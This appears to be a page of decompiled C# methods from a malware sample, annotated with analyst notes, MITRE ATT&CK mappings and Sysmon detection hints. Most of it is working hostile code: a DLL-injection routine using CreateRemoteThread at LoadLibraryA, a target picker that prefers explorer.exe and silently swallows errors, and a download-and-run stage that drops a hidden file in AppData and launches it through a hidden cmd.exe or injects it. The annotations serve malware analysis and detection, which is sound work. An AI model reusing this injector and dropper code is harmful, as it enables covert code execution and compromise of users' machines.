Esempio n. 1
        // Token: 0x060001D3 RID: 467 RVA: 0x0000EB20 File Offset: 0x0000CD20
        /// <summary>
        /// Analyst note: decompiled sample with obfuscated names. Causes the process
        /// <paramref name="process_0"/> to load the library at path <paramref name="string_0"/>
        /// by starting a remote thread at LoadLibraryA with the path as its argument.
        /// This is the classic DLL-injection sequence (MITRE ATT&amp;CK T1055.001).
        /// </summary>
        /// <param name="string_0">Path string copied into the target process and passed to LoadLibraryA.</param>
        /// <param name="process_0">Process whose Id is opened and written to.</param>
        /// <returns>Always 0; no call result is inspected, so the value says nothing about success.</returns>
        /// <remarks>
        /// The Class20.* members are presumably P/Invoke wrappers for the kernel32 functions of the
        /// same names; their declarations are not shown here, so the constant meanings below assume that.
        /// Detection: Sysmon Event ID 10 (ProcessAccess) with this access mask, Event ID 8
        /// (CreateRemoteThread) from a .NET process into another process, and Event ID 7 (ImageLoad)
        /// of an unsigned DLL from a user-writable folder are the usual telemetry for this pattern.
        /// </remarks>
        public static int smethod_1(string string_0, Process process_0)
        {
            // 1082 = 0x43A. If this is kernel32!OpenProcess, that is PROCESS_CREATE_THREAD |
            // PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION.
            // The handle is neither checked for failure nor closed in the visible code.
            IntPtr  intptr_     = Class20.OpenProcess(1082, false, process_0.Id);
            // Address of LoadLibraryA is resolved in the current process and reused as the remote thread entry point.
            IntPtr  procAddress = Class20.GetProcAddress(Class20.GetModuleHandle("kernel32.dll"), "LoadLibraryA");
            // 12288U = 0x3000 (MEM_COMMIT | MEM_RESERVE), 4U = PAGE_READWRITE, assuming Win32 VirtualAllocEx semantics.
            IntPtr  intPtr      = Class20.VirtualAllocEx(intptr_, IntPtr.Zero, (uint)((string_0.Length + 1) * Marshal.SizeOf(typeof(char))), 12288U, 4U);
            UIntPtr uintPtr;

            // Copies the path, encoded with the system default code page, into the remote buffer.
            Class20.WriteProcessMemory(intptr_, intPtr, Encoding.Default.GetBytes(string_0), (uint)((string_0.Length + 1) * Marshal.SizeOf(typeof(char))), out uintPtr);
            // Remote thread: entry = LoadLibraryA, parameter = remote buffer holding the path. Result is discarded.
            Class20.CreateRemoteThread(intptr_, IntPtr.Zero, 0U, procAddress, intPtr, 0U, IntPtr.Zero);
            return(0);
        }
Esempio n. 2
 // Token: 0x060001DD RID: 477 RVA: 0x0000EC58 File Offset: 0x0000CE58
 /// <summary>
 /// Reports whether the current process runs under WOW64, as answered by
 /// Class20.IsWow64Process (declaration not shown; presumably the kernel32 import).
 /// </summary>
 /// <returns>
 /// The flag written by IsWow64Process when the call succeeds; false when the call
 /// fails or when the OS version is older than 5.1.
 /// </returns>
 public static bool smethod_4()
 {
     Version osVersion = Environment.OSVersion.Version;

     // The query is only attempted on version 5.1 or any 6.x and later.
     bool versionQualifies = osVersion.Major >= 6 || (osVersion.Major == 5 && osVersion.Minor >= 1);
     if (!versionQualifies)
     {
         return(false);
     }

     using (Process self = Process.GetCurrentProcess())
     {
         bool isWow64;
         // A failed call is treated the same as "not WOW64".
         return(Class20.IsWow64Process(self.Handle, out isWow64) && isWow64);
     }
 }
Esempio n. 3
 // Token: 0x060001D4 RID: 468 RVA: 0x0000EBE0 File Offset: 0x0000CDE0
 /// <summary>
 /// Analyst note: chooses a host process and hands it, together with the library path
 /// <paramref name="string_0"/>, to Class20.smethod_1. The first process named "explorer"
 /// is preferred; if none exists, a process is picked by random index from the process list.
 /// </summary>
 /// <param name="string_0">Library path forwarded unchanged to Class20.smethod_1.</param>
 /// <remarks>
 /// Every exception is swallowed, so failures leave no trace in the caller.
 /// Class20.bool_0 is set to true whenever smethod_1 returns without throwing; since
 /// smethod_1 as shown on this page always returns 0 and checks nothing, the flag does
 /// not prove that a library was actually loaded.
 /// Detection: explorer.exe (or an arbitrary process) being opened for write/thread-create
 /// access by an unrelated .NET process is the event worth alerting on.
 /// </remarks>
 public static void smethod_2(string string_0)
 {
     try
     {
         Process process_;
         // The process list is queried twice here; the two snapshots are independent.
         if (Process.GetProcessesByName("explorer").Length != 0)
         {
             process_ = Process.GetProcessesByName("explorer")[0];
         }
         else
         {
             // Fallback: index drawn from [1, count); index 0 is never selected.
             // The list is re-read for the lookup, so the index may no longer be valid
             // (any resulting exception is caught below).
             int maxValue = Process.GetProcesses().Length;
             int num      = new Random().Next(1, maxValue);
             process_ = Process.GetProcesses()[num];
         }
         Class20.smethod_1(string_0, process_);
         // Marks the attempt as done; see remarks on why this is not a success indicator.
         Class20.bool_0 = true;
     }
     catch
     {
         // Deliberately silent: no logging, no rethrow.
     }
 }
Esempio n. 4
        // Token: 0x060001D2 RID: 466 RVA: 0x0000E950 File Offset: 0x0000CB50
        /// <summary>
        /// Analyst note: download-and-run stage. Fetches the resource at URL
        /// <paramref name="string_0"/> into the user's ApplicationData folder under the file name
        /// <paramref name="string_1"/>, marks the file Hidden, and then either executes it
        /// (names ending in ".exe") or passes its path to Class20.smethod_2 (names ending in ".dll").
        /// </summary>
        /// <param name="string_0">Source URL; an empty string makes the method do nothing.</param>
        /// <param name="string_1">
        /// Target file name, appended to the ApplicationData path without any sanitisation.
        /// The suffix test is case-sensitive, so only lower-case ".exe" / ".dll" match.
        /// </param>
        /// <remarks>
        /// No integrity or signature check is applied to the downloaded content, and all
        /// exceptions are swallowed. Behaviours map to MITRE ATT&amp;CK T1105 (Ingress Tool Transfer),
        /// T1564.001 (Hidden Files and Directories) and T1059.003 (Windows Command Shell).
        /// Detection: a hidden .exe/.dll created directly under the roaming AppData folder by a
        /// process that also made an outbound web request, followed by a hidden cmd.exe with
        /// "/c" and a path inside AppData, is a strong indicator.
        /// </remarks>
        public static void smethod_0(string string_0, string string_1)
        {
            // Resolves the per-user ApplicationData (roaming) directory; writable without elevation.
            string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);

            if (string_0 != "")
            {
                if (string_1.EndsWith(".exe"))
                {
                    try
                    {
                        // Remove a previous copy so the download can overwrite it; failure is ignored.
                        if (File.Exists(folderPath + "\\" + string_1))
                        {
                            try
                            {
                                File.Delete(folderPath + "\\" + string_1);
                            }
                            catch
                            {
                            }
                        }
                        using (WebClient webClient = new WebClient())
                        {
                            webClient.DownloadFile(string_0, folderPath + "\\" + string_1);
                        }
                        // Hidden attribute keeps the file out of default Explorer views.
                        File.SetAttributes(folderPath + "\\" + string_1, FileAttributes.Hidden);
                        string str = folderPath + "\\" + string_1;
                        // Launch is proxied through a hidden cmd.exe, so the process tree shows
                        // cmd.exe as the parent of the dropped executable. The path is concatenated
                        // into the command line unquoted.
                        Process.Start(new ProcessStartInfo
                        {
                            UseShellExecute  = true,
                            WorkingDirectory = "C:\\Windows\\System32",
                            FileName         = "C:\\Windows\\System32\\cmd.exe",
                            Arguments        = "/c " + str,
                            WindowStyle      = ProcessWindowStyle.Hidden
                        });
                        return;
                    }
                    catch
                    {
                        // Any failure in the .exe path ends the method silently.
                        return;
                    }
                }
                if (string_1.EndsWith(".dll"))
                {
                    // Same clean-up as the .exe branch; delete errors are ignored.
                    if (File.Exists(folderPath + "\\" + string_1))
                    {
                        try
                        {
                            File.Delete(folderPath + "\\" + string_1);
                        }
                        catch
                        {
                        }
                    }
                    try
                    {
                        using (WebClient webClient2 = new WebClient())
                        {
                            webClient2.DownloadFile(string_0, folderPath + "\\" + string_1);
                        }
                        File.SetAttributes(folderPath + "\\" + string_1, FileAttributes.Hidden);
                        // The dropped library's full path is handed to Class20.smethod_2.
                        Class20.smethod_2(folderPath + "\\" + string_1);
                    }
                    catch
                    {
                        // Download, attribute or hand-off errors are discarded.
                    }
                }
            }
        }